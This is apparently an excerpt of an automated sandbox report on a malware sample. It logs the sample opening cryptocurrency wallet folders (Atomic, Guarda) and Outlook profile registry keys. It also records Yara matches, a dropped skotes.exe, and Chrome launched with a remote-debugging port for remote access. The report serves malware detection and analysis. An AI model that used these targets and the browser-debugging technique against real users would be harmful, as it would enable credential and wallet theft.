Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Directory queried: C:\Users\user\Documents
Source: Yara match File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1970779986.0000000000474000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC40C40 sqlite3_bind_zeroblob, 0_2_6CC40C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC40D60 sqlite3_bind_parameter_name, 0_2_6CC40D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB68EA0 sqlite3_clear_bindings, 0_2_6CB68EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6CC40B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB66410 bind,WSAGetLastError, 0_2_6CB66410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB660B0 listen,WSAGetLastError, 0_2_6CB660B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6C030 sqlite3_bind_parameter_count, 0_2_6CB6C030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB66070 PR_Listen, 0_2_6CB66070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 0_2_6CB6C050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF22D0 sqlite3_bind_blob, 0_2_6CAF22D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB663C0 PR_Bind, 0_2_6CB663C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB69480 sqlite3_bind_null, 0_2_6CB69480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB694F0 sqlite3_bind_text16, 0_2_6CB694F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB694C0 sqlite3_bind_text, 0_2_6CB694C0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A3EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 20_2_00A3EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A3DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_00A3DF51